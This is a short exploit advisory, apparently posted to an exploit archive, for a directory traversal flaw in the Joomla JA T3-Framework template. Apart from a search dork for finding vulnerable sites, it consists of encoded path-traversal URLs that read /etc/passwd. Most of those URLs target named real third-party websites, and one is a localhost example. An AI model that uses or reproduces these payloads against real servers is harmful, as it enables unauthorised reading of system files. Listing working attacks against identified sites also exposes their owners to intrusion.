======================================================================= Joomla template JA T3-Framework Directory Traversal Vulnerability 0-Day ======================================================================= # Vendor: hhttp://extensions.joomla.fr/extensions/index-des-extensions-fr/1788-Templates/4151-ja-t3-framework-joomla-15 # Author : indoushka # Tested on : Ubuntu Linux 9.10 ######################################################## # Dork : inurl:/index.php?jat3action= # Demo : http://www.maxim-tours.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action= gzip&type=css&v=1 http://www.taqadoumy.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz ip&type=css&v=1 http://iraneconomist.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz ip&type=css&v=1 http://yxact.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&t ype=css&v=1 http://www.rtmcsumut.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz ip&type=css&v=1 http://news.lk/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&typ e=css&v=1 http://www.guiaenarm.net/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz ip&type=css&v=1 http://britanskie-kotiki.ru/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action =gzip&type=css&v=1 http://profidom.com.ua/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip &type=css&v=1 ------------- http://localhost/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip& amp;type=css&v=1 ******************************************************